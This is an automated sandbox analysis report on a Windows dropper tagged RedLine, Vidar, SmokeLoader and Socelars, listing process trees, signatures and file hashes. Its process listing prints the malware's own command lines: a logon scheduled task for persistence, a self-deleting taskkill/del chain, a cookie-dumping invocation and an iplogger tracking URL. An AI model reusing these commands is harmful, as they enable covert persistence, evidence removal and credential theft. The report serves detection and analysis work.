Malware Analysis Report

2025-01-02 15:46

Sample ID 210722-7f39811rfn
Target 7E03737D683BC19280A5DC25BEFC85B6.exe
SHA256 7d307d58ea8702aa1600cb785125936c0c6643f8e892b789d633105ba246c449
Tags
redline smokeloader vidar 933 build2 aspackv2 backdoor infostealer stealer suricata trojan socelars ani miner persistence upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file 7E03737D683BC19280A5DC25BEFC85B6.exe was found to be: Known bad.

Malicious Activity Summary

Process spawned unexpected child process

Socelars

Socelars Payload

Vidar

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

SmokeLoader

suricata: ET MALWARE GCleaner Downloader Activity M1

RedLine

suricata: ET MALWARE Win32/Ficker Stealer Activity M3

RedLine Payload

Vidar Stealer

Executes dropped EXE

Downloads MZ/PE file

ASPack v2.12-2.42

UPX packed file

Loads dropped DLL

Cryptocurrency Miner

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Kills process with taskkill

Checks SCSI registry key(s)

Creates scheduled task(s)

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-22 23:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-22 23:31

Reported

2021-07-22 23:33

Platform

win7v20210408

Max time kernel

15s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

Signatures

RedLine

infostealer redline

RedLine Payload

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata

Vidar Stealer

stealer

ASPack v2.12-2.42

aspackv2

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1348 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe
PID 1176 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 836 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe
PID 1060 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.exe

sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

"C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\Install2.EXE

"C:\Users\Admin\AppData\Local\Temp\Install2.EXE"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Roaming\system64.exe

"C:\Users\Admin\AppData\Roaming\system64.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS1C76.tmp\Install.cmd" "

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1Df2r7

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_6.exe

sonia_6.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2156 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im sonia_3.exe /f

C:\Users\Admin\Documents\me4HyvW74QPkW5CTxdLrPYCE.exe

"C:\Users\Admin\Documents\me4HyvW74QPkW5CTxdLrPYCE.exe"

C:\Users\Admin\Documents\JiIhuE2aeHPXQC1TBgGqPrRe.exe

"C:\Users\Admin\Documents\JiIhuE2aeHPXQC1TBgGqPrRe.exe"

C:\Users\Admin\Documents\xpb4CCxssxwBWF_0BV0A2_7s.exe

"C:\Users\Admin\Documents\xpb4CCxssxwBWF_0BV0A2_7s.exe"

C:\Users\Admin\Documents\YtengLF1TxOE1DGRbJwVTVVh.exe

"C:\Users\Admin\Documents\YtengLF1TxOE1DGRbJwVTVVh.exe"

C:\Users\Admin\Documents\7844e8syRVQtIgQ_jRcbiAfV.exe

"C:\Users\Admin\Documents\7844e8syRVQtIgQ_jRcbiAfV.exe"

C:\Users\Admin\Documents\sm6zeEcSzIru1cQiXT2OvnYl.exe

"C:\Users\Admin\Documents\sm6zeEcSzIru1cQiXT2OvnYl.exe"

C:\Users\Admin\Documents\J_q0QK5EeayHdL_1uG1EvYY1.exe

"C:\Users\Admin\Documents\J_q0QK5EeayHdL_1uG1EvYY1.exe"

C:\Users\Admin\Documents\O9j7WkZyvgdRdwQm5ZBbRnEv.exe

"C:\Users\Admin\Documents\O9j7WkZyvgdRdwQm5ZBbRnEv.exe"

C:\Users\Admin\Documents\EYXoLzttpwauSuAEFA4P_QpF.exe

"C:\Users\Admin\Documents\EYXoLzttpwauSuAEFA4P_QpF.exe"

C:\Users\Admin\Documents\RByJyGOr81o74VPkNlUVXzrZ.exe

"C:\Users\Admin\Documents\RByJyGOr81o74VPkNlUVXzrZ.exe"

C:\Users\Admin\Documents\tXaDC7Mf9S4CWJXctSx5X4jq.exe

"C:\Users\Admin\Documents\tXaDC7Mf9S4CWJXctSx5X4jq.exe"

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

"C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe"

C:\Users\Admin\Documents\6j8Mb2LImEI9Gyja0Lomsxfz.exe

"C:\Users\Admin\Documents\6j8Mb2LImEI9Gyja0Lomsxfz.exe"

C:\Users\Admin\Documents\pOeTwm0qtF3qUKbidKMU4Ouj.exe

"C:\Users\Admin\Documents\pOeTwm0qtF3qUKbidKMU4Ouj.exe"

C:\Users\Admin\Documents\7YcPYG6UYI1WjUYMHrmsAPWR.exe

"C:\Users\Admin\Documents\7YcPYG6UYI1WjUYMHrmsAPWR.exe"

C:\Users\Admin\Documents\Dsg12OO1nljdVJwp877ogvSQ.exe

"C:\Users\Admin\Documents\Dsg12OO1nljdVJwp877ogvSQ.exe"

C:\Users\Admin\Documents\tMeZ4LJLMgQI2y2ExwxYgFDE.exe

"C:\Users\Admin\Documents\tMeZ4LJLMgQI2y2ExwxYgFDE.exe"

C:\Users\Admin\Documents\i4sYt1TLtxo7DKvkT1e4YHpl.exe

"C:\Users\Admin\Documents\i4sYt1TLtxo7DKvkT1e4YHpl.exe"

C:\Users\Admin\Documents\8hsO_3a9Rywuc1shfv6VvMEP.exe

"C:\Users\Admin\Documents\8hsO_3a9Rywuc1shfv6VvMEP.exe"

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

C:\Users\Admin\Documents\3AeguyJ_N3Rox0yrvFLG3ugQ.exe

Network


Files

memory/1348-59-0x00000000762C1000-0x00000000762C3000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

memory/1176-63-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS44550A84\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS44550A84\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS44550A84\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS44550A84\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

\Users\Admin\AppData\Local\Temp\7zS44550A84\setup_install.exe

MD5 b1b08befa4d0b60d8cf636ef7fa77779
SHA1 45c2bbd6af057098d1d1e4c925daa7c353ed024c
SHA256 08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a
SHA512 e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

memory/1176-80-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1176-82-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1176-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1176-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1176-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.txt

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

memory/1176-97-0x0000000064940000-0x0000000064959000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.txt

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

memory/1176-99-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1176-100-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/836-101-0x0000000000000000-mapping.dmp

memory/1344-98-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_6.txt

MD5 0c3f670f496ffcf516fe77d2a161a6ee
SHA1 0c59d3494b38d768fe120e0a4ca2a1dca7567e6e
SHA256 8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0
SHA512 bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

memory/1060-105-0x0000000000000000-mapping.dmp

memory/1048-103-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.txt

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.txt

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.txt

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.txt

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.txt

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

memory/1176-88-0x0000000000400000-0x000000000051D000-memory.dmp

memory/1176-87-0x0000000000400000-0x000000000051D000-memory.dmp

memory/1176-86-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1176-81-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1456-107-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.exe

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_8.exe

MD5 c04d390489ac28e849ca9159224822af
